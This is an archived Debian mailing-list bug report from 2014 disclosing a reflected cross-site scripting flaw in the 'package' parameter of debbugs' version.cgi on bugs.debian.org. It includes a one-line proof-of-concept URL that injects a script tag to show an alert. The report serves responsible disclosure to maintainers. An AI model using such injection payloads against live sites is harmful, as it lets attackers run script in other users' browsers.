Bug#762967: XSS in bugs.debian.org/cgi-bin/version.cgi

Fri, 26 Sep 2014 10:21:28 -0700 

Package: debbugs
Severity: important

bugs.debian.org/cgi-bin/version.cgi contains an XSS vulnerability in the
'package' var.

PoC:
https://bugs.debian.org/cgi-bin/version.cgi?info=1;package=%3C/title%3E%3Cscript%3Ealert('xss')%3B%3C/script%3E

-v


-- 
To UNSUBSCRIBE, email to [email protected]
with a subject of "unsubscribe". Trouble? Contact [email protected]
Archive: https://lists.debian.org/[email protected]

Reply via email to